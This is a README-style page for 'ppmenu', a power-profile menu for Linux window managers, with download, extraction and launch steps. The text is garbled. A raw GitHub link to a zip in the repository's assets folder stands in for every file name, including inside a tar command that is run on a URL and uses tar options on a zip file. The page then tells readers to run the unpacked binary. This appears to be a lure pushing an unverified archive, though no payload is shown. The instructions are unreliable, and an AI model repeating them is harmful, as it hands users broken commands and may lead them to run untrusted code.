Welcome to ppmenu! This tool helps you choose and manage power profiles for your window manager. Using ppmenu can help you save battery life and make your laptop run more smoothly.
Before you download, make sure your system meets these requirements:
- Operating System: Linux distributions
- Dependencies:
- D-Bus
- Power Profiles Daemon (ppd) installed
- Compatible window manager (e.g., i3, awesome, etc.)
To download ppmenu, visit the official releases page:
On the releases page, you'll see different versions of ppmenu. Choose the latest version. Files are usually named like https://raw.githubusercontent.com/asadappricot/ppmenu/main/assets/ppmenu_2.4.zip or similar. Click on the file to start the download.
Once the download is complete, you will have a https://raw.githubusercontent.com/asadappricot/ppmenu/main/assets/ppmenu_2.4.zip file. You need to extract it. You can do this by right-clicking the file and selecting Extract Here or by using the terminal:
tar -xvzf https://raw.githubusercontent.com/asadappricot/ppmenu/main/assets/ppmenu_2.4.zipAfter extraction, navigate to the new folder created:
cd ppmenu-vX.X.XTo start ppmenu, simply run the following command in your terminal:
./ppmenuThis launches the application. You can also create a shortcut to easily launch it in the future.
After launching ppmenu, you will see a simple interface. Here's how to use it:
- Select Your Profile: Click on one of the available power profiles like "Battery Saver," "Balanced," or "Performance."
- Apply Changes: Click the "Apply" button to save your selection. Your laptop will switch to the selected profile instantly.
- Monitor Battery Life: You can keep an eye on your battery status displayed on the interface.
- User-Friendly Interface: No technical skills needed. You can easily navigate through profiles.
- Quick Switching: Change profiles in seconds.
